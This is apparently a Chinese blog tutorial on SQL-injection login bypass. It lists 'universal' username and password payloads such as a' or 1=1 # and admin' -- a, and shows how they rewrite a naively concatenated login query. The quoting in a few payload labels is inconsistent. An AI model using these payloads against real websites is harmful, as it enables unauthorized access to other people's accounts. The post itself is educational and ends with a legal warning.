摘要:自从上次狗剩被隔壁大娘嚼舌根以后,便怀恨在心,一气之下破解了大妈的农场密码,并偷走了大娘种的菜。
自从上次狗剩被隔壁大娘嚼舌根以后,便怀恨在心,一气之下破解了大妈的农场密码,并偷走了大娘种的菜。
狗剩:“隔壁大娘,快去农场看看吧,你菜死了!”
我们平时登录账号时,如果是第一次登录,系统会提示我们注册账号,并将我们注册的账号和密码保存到数据库中。当我们再次登录时,系统会将我们输入的账号和密码和数据库中的数据进行匹配,匹配成功能登录。这就意味着我们需要知道一个已经注册过并且正确的账号和密码才能进行登录,那如果我不小心忘记了我的账号或者密码,或者我压根就不知道账号和密码,还有没有办法登录呢?答案是肯定的,那就是 【万能账号密码】
万能账号密码是指 【万能账号】和 【万能密码】,顾名思义,就是可以 【登录任意网站】的账号和密码
当我们不知道用户的账号并且不知道用户的密码时,可以使用万能账号。
万能账号并不是一个真正意义上的账号,它是一种【拥有不同变体的格式】
需要注意的是,以下所有万能账号中的 a 可以是自定义的数字或字母,比如 1,2,3,b,c,d
【数值型万能账号】
a or true #
a or 1 #
a or 1=1 #
a or true -- a
a or 1 -- a
a or 1=1 -- a
【单引号字符型万能密码】
a" or true #
a" or 1 #
a" or 1=1 #
a" or true --a
a" or 1 -- a
a" or 1=1 -- a
【双引号字符型万能密码】
a" or true #
a" or 1 #
a" or 1=1 #
a" or true -- a
a" or 1 -- a
a" or 1=1 -- a
当我们知道用户的账号,但不知道用户的密码时,可以使用万能密码
万能密码并不是一个真正意义上的密码,而是一个【拥有不同变体的格式】
需要注意的是:万能密码中的 admin,必须是真实的用户名
【数值型万能密码】
admin #
admin -- a
【单引号字符串型万能密码】
admin" #
admin" -- a
【双引号字符串型万能密码】
admin” #
admin" -- a
一个网络安全意识淡薄的网站,其登录功能的SQL语句大概是下面这个样子
select * from user where username="user" and password="pass"
当我们在登录界面输入 【万能账号】比如 a’ or true # 以后,后端会将我们输入的参数拼接到SQL中,然后去数据库中查询账号和密码,SQL语句大概是下面这样
select * from user where username="a" or true #" and password="pass"
由于 # 在SQL中是注释符,注释符后面的内容不起作用,所以真正执行的SQL语句大概是下面这样
select * from user where username="a" or true
or true 会使SQL语句恒成立,从而查询出数据库中的所有账号和密码,从而使我们成功登录
除了 # 以外, --
也是SQL中的注释符,但SQL的语法格式规定--
和后面的注释内容必须间隔一个空格,所以这需要使用 a" or 1 -- a
而不是 a" or 1 --
其原理和 a’ or 1 # 大同小异,拼接到SQL中大概是下面这样
select * from user where username="a" or true -- a" and password="pass"
注释后面的内容不生效,真正执行的SQL大概是下面这样
select * from user where username="a" or true
SQL语句恒成立,从而登录成功
换句话来说,a" or true -- a
经过SQL的转化后,结果等价于 a’ or true #
SQL中规定,非布尔类型的数据参与比较运算时,会转化为布尔类型再参与运算。比如 or 1 或者 or 1=1 ,会转化为布尔类型的 true 再参与 or 的比较运算,也就是变成 or true ,同样能使条件恒成立,从而登录成功
简单来讲就是:a" or 1 #
或者 a" or 1=1 #
等价于 a" or true #
当我们在登录界面输入 【万能密码】 比如 admin’ # 以后,后端会将我们输入的参数拼接到SQL中,大概是下面这样
select * from user where username="admin" #" and password="pass"
由于 # 在SQL中是注释符,注释符后面的内容不起作用,所以真正执行的SQL大概是下面这样
select * from user where username="admin"
SQL只会在数据库中查询用户名,而不是同时查询用户名和密码,这就意味着,只要用户名正确,就可以登录成功
除了 # ,--
在SQL中也是注释符,SQL的语法格式规定 --
后面必须使用空格来间隔后面的注释内容,所以需要将 --
写作 -- a
,后面的 a 可以是任意数字或者字母
简单来件就是 admin’ – a 等价于 admin‘ #
【万能账号密码】适用于网络安全意识较差的网站,如果发现了可以使用的网站,切勿进行下一步操作,动歪脑筋的同学请在心理默念三遍:【我国有一部完整且历史悠久的法律】
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/121744.html
摘要:二协议简介什么是协议协议全称是,翻译成中文就是网络爬虫排除协议,别名爬虫协议,机器人协议等。协议代表一种网站的根目录契约精神,所有网站都应该遵守这一约定,以保证网站以及用户的隐私数据不被泄露。 ...
摘要:哪吒社区技能树打卡打卡贴函数式接口简介领域优质创作者哪吒公众号作者架构师奋斗者扫描主页左侧二维码,加入群聊,一起学习一起进步欢迎点赞收藏留言前情提要无意间听到领导们的谈话,现在公司的现状是码农太多,但能独立带队的人太少,简而言之,不缺干 ? 哪吒社区Java技能树打卡 【打卡贴 day2...
摘要:公司主站中会有业务方向合作单位等信息。人员信息收集针对人员的信息收集考虑对目标重要人员组织架构社会关系的收集和分析。其中重要人员主要指高管系统管理员开发运维财务人事业务人员的个人电脑。 目录 3.6.1. 企业信息收集 3.6.2. 人员信息收集 3.6.3. 钓鱼 3.6.4. 其他信息 ...
摘要:时间永远都过得那么快,一晃从年注册,到现在已经过去了年那些被我藏在收藏夹吃灰的文章,已经太多了,是时候把他们整理一下了。那是因为收藏夹太乱,橡皮擦给设置私密了,不收拾不好看呀。 ...
摘要:大家好,我是冰河有句话叫做投资啥都不如投资自己的回报率高。马上就十一国庆假期了,给小伙伴们分享下,从小白程序员到大厂高级技术专家我看过哪些技术类书籍。 大家好,我是...
阅读 3114·2021-11-24 09:39
阅读 3599·2021-11-22 09:34
阅读 983·2021-11-15 11:38
阅读 1613·2021-10-11 10:58
阅读 3636·2021-10-08 10:04
阅读 4518·2021-08-11 11:17
阅读 954·2019-08-29 13:58
阅读 2426·2019-08-28 18:18